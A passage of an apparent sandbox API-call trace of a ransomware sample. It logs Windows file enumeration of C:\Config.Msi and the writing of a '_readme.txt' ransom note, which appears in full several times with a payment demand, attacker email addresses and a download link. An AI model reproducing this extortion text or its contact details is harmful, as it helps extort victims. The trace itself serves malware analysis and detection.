nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0228.443] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0228.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5f10 [0228.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x214) returned 0x346fc30 [0228.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b792d0 [0228.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b792a8 [0228.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79280 [0228.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79190 [0228.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b791e0 [0228.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79410 [0228.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79438 [0228.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79460 [0228.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79488 [0228.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b794b0 [0228.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b794d8 [0228.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79500 [0228.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79528 [0228.443] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0228.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5f10 [0228.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c65a0 [0228.443] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0228.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5f10 [0228.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79208 [0228.443] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0228.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5f10 [0228.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79258 [0228.444] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0228.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5f10 [0228.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b793e8 [0228.444] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0228.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5f10 [0228.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b793c0 [0228.444] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0228.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5f10 [0228.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x310) returned 0x3b7a060 [0228.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79398 [0228.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79370 [0228.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79348 [0228.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79320 [0228.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b791b8 [0228.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79168 [0228.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79230 [0228.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79550 [0228.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79578 [0228.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b795a0 [0228.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b795c8 [0228.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b795f0 [0228.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79618 [0228.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79640 [0228.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79668 [0228.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79690 [0228.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b796b8 [0228.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b796e0 [0228.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79708 [0228.445] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0228.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5f10 [0228.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c65a0 [0228.445] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0228.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5f10 [0228.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b793e8 [0228.445] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0228.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5f10 [0228.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79258 [0228.445] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0228.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5f10 [0228.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79208 [0228.445] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0228.445] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.445] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5f10 [0228.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.445] PathFindFileNameW (pszPath="C:\\Config.Msi\\") returned="Config.Msi\\" [0228.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.446] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.446] PathFindFileNameW (pszPath="") returned="" [0228.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5f10 [0228.446] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.446] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x3b78058 [0228.446] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x3466cb0 [0228.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b792f8 [0228.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79528 [0228.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5f10 | out: hHeap=0x620000) returned 1 [0228.446] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b792f8 | out: hHeap=0x620000) returned 1 [0228.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79528 | out: hHeap=0x620000) returned 1 [0228.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79528 [0228.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x81c) returned 0x3466cb0 [0228.447] PathAppendW (in: pszPath="C:\\Config.Msi\\", pMore="_readme.txt" | out: pszPath="C:\\Config.Msi\\_readme.txt") returned 1 [0228.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.447] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79528 | out: hHeap=0x620000) returned 1 [0228.447] PathFileExistsW (pszPath="C:\\Config.Msi\\_readme.txt") returned 0 [0228.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x3b7a378 [0228.447] lstrcpyW (in: lpString1=0x3b7a378, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.447] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3467538 [0228.447] CreateFileW (lpFileName="C:\\Config.Msi\\_readme.txt" (normalized: "c:\\config.msi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3467538 | out: hHeap=0x620000) returned 1 [0228.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a378 | out: hHeap=0x620000) returned 1 [0228.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79528 [0228.448] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0xffffffff [0228.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79528 | out: hHeap=0x620000) returned 1 [0228.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c68 [0228.448] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7bd8 [0228.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7bd8 | out: hHeap=0x620000) returned 1 [0228.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7bd8 [0228.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7bd8 | out: hHeap=0x620000) returned 1 [0228.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7bd8 [0228.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7bd8 | out: hHeap=0x620000) returned 1 [0228.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7bd8 [0228.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7bd8 | out: hHeap=0x620000) returned 1 [0228.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7bd8 [0228.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7bd8 | out: hHeap=0x620000) returned 1 [0228.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7bd8 [0228.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7bd8 | out: hHeap=0x620000) returned 1 [0228.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c68 | out: hHeap=0x620000) returned 1 [0228.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c6618 [0228.449] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 